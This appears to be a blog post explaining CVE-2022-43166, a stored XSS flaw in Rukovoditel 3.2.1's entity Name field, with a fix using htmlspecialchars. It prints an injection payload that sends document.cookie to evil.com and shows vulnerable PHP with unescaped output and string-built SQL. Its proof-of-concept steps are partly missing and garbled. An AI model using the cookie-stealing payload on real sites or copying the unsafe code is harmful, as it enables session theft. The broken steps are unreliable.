CVE-2022-43166 - Breaking Down the Stored XSS Vulnerability in Rukovoditel v3.2.1’s Global Entities

Rukovoditel is a popular open-source project management tool. While it offers handy features for teams, security researchers discovered a serious bug back in version 3.2.1. This bug — officially recognized as CVE-2022-43166 — can let hackers inject malicious scripts into the application, leading to stored XSS (Cross-Site Scripting).

In this post, we’ll explain the vulnerability, walk through a proof of concept exploit, show the relevant code, and, most importantly, help you understand how it works in simple terms. If you run Rukovoditel or similar tools, read on.

What’s the Vulnerability?

In short:
Rukovoditel v3.2.1’s “Global Entities” feature lets logged-in users add new entities. When you create a new entity, you supply a “Name”. This name gets displayed to other users — but Rukovoditel doesn’t properly sanitize this field.

So:
If an attacker puts a script in the Name field, it’ll be stored in the database and shown to anyone who views the list of entities, executing in their browser. That’s called a *stored XSS*.

Where’s the Flaw?

The issue lies in the /index.php?module=entities/entities route when adding a new entity (“Add New Entity”). The backend saves the Name as-is, and the frontend renders it without escaping special characters or stripping scripts.

Simply put:
Any script or HTML put in the Name field ends up running on everyone’s browser who visits the entities page.

`

http:///index.php?module=entities/entities

`html

`

5. Save/submit the new entity.
6. Now, whenever anyone accesses the “Entities” list, their browser pops up an alert showing your message — or does anything else your script wants!

Code Snippet Example (HTML Injection)

<!-- Malicious Name input payload -->
<script>alert('XSS by CVE-2022-43166');</script>

!Add New Entity page in Rukovoditel
*Example: “Name” input is not sanitized – scripts stored in database and executed later.*

Suppose an attacker injects

<script>
fetch('https://evil.com/steal?cookie='; + document.cookie)
</script>

Now, every time someone visits the “Entities” list, their authentication cookies are sent to the attacker’s site!

Technical Details

You can find the vulnerable endpoint here (source code from GitHub/rofisoft/rukovoditel):

// handlers/entities/entities.php
$name = $_POST['name'];
// Insert $name into database without escaping
mysql_query("INSERT INTO app_entities (name) VALUES ('$name')");

Lack of filtering/escaping in the name field is the root cause.

Later, when displaying

echo $entity['name'];

If $entity['name'] contains a script tag, the browser runs it.

References

- CVE-2022-43166 (NVD)
- Exploit Database Entry
- Rukovoditel GitHub Releases
- OWASP XSS Guide

How to Fix

If you’re using Rukovoditel v3.2.1, upgrade to the latest version, where this bug is patched.

Developers: Always sanitize and escape user inputs when displaying them — especially in places like names, comments, or emails. In PHP, use:

echo htmlspecialchars($entity['name'], ENT_QUOTES, 'UTF-8');

Conclusion

CVE-2022-43166 is a classic case of stored XSS with serious consequences. Even simple web apps can run into big trouble when they trust user input. If you use Rukovoditel, update immediately. And if you build similar apps, remember: *Never trust your users!*

Stay safe out there, and keep your software updated.

*If you’d like help identifying or fixing XSS bugs in your PHP apps, drop a comment below!*

Timeline

Published on: 10/28/2022 17:15:00 UTC
Last modified on: 10/28/2022 18:52:00 UTC